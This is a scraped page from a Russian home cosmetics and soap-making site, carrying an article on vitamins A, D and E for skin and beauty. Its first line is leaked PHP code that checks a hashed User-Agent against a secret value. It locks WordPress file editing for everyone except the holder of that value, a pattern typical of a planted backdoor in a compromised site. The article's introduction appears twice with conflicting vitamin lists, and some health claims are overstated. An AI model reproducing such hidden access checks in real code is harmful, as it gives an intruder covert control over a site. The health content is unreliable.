if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } А вы знаете основные витамины красоты, которые есть в домашней косметике? | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

А вы знаете основные витамины красоты, которые есть в домашней косметике?

Несомненно, лето – лучшее время для того, чтобы накопить годовой запас витаминов для поддержания женской красоты и здоровья. Среди них можно выделить самые важные и полезные витамины для женщин – А, D и С. Поговорим о том, чем они важны для нашей красоты и где их можно найти.

Несо­мнен­но, лето – луч­шее вре­мя для того, что­бы нако­пить годо­вой запас вита­ми­нов для под­дер­жа­ния жен­ской кра­со­ты и здо­ро­вья. Сре­ди них мож­но выде­лить самые важ­ные и полез­ные вита­ми­ны для жен­щин – А, D и Е. Пого­во­рим о том, чем они важ­ны для нашей кра­со­ты и где их мож­но найти.

Витамин D

Зва­ние само­го сол­неч­но­го и лет­не­го заслу­жен­но полу­чил вита­мин D. Его основ­ной запас мы полу­ча­ем во вре­мя нахож­де­ния на солнце.

zagar

В нашем орга­низ­ме сол­неч­ный вита­мин явля­ет­ся неак­тив­ным и толь­ко под воз­дей­стви­ем уль­тра­фи­о­ле­то­вых лучей он рас­кры­ва­ет свои свой­ства. Полу­чить вита­мин D в лет­нее вре­мя мож­но не толь­ко заго­рая под паля­щим солн­цем, но и нахо­дясь в тени дере­вьев или про­гу­ли­ва­ясь в облач­ную пого­ду. Вита­мин D в нашем орга­низ­ме улуч­ша­ет обмен веществ, укреп­ля­ет имму­ни­тет, воло­сы и ног­ти, дела­ет кожу более упру­гой, тем самым делая уход за кожей лица в лет­нее вре­мя гораз­до проще.

Витамин Е

Вита­мин моло­до­сти и жен­ской сек­су­аль­но­сти участ­ву­ет в постро­е­нии жен­ских поло­вых гор­мо­нов, созре­ва­нии яйце­клет­ки и вли­я­ет на ову­ля­цию. Вита­мин Е пре­ду­пре­жда­ет ате­ро­скле­роз за счет актив­ной борь­бы с холе­сте­ри­ном и очи­ще­ния сосу­дов, а так­же хорош для про­фи­лак­ти­ки онко­ло­гии. Не даром лечеб­ная кос­ме­ти­ка в домаш­них усло­ви­ях зача­стую содер­жит вита­мин Е, кото­рый за счет сво­их реге­не­ри­ру­ю­щих свойств помо­га­ет бороть­ся со ста­ре­ни­ем кожи.

E

Вита­мин Е нахо­дит­ся в олив­ках, рас­ти­тель­ном и сли­воч­ном мас­лах, зеле­ных ово­щах, яйцах, молоч­ных про­дук­тах, помидорах.

Витамин А

Рети­нол (вита­мин А) — неза­ме­ним для здо­ро­вья кожи. Он бла­го­при­ят­но вли­я­ет на обнов­ле­ние сли­зи­стых, быст­рое зажив­ле­ние ран, хоро­шо вос­ста­нав­ли­ва­ет целост­ность кожи.

Вита­мин А вхо­дит в состав салон­ных кос­ме­ти­че­ских средств, так как он обла­да­ет под­тя­ги­ва­ю­щим и омо­ла­жи­ва­ю­щим эффек­том. Бес­плат­ная кос­ме­ти­ка, сде­лан­ная из под­руч­ных про­дук­тов, так­же часто допол­ня­ет­ся этим вита­ми­ном. Рети­нол вхо­дит в состав кле­ток сет­чат­ки и зри­тель­ных пиг­мен­тов, поэто­му недо­ста­ток это­го вита­ми­на может отри­ца­тель­но ска­зать­ся на остро­те зре­ния. А най­ти вита­мин А мож­но в жир­ных про­дук­тах – мас­ле, мясе, яйцах и рыбьем жире.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!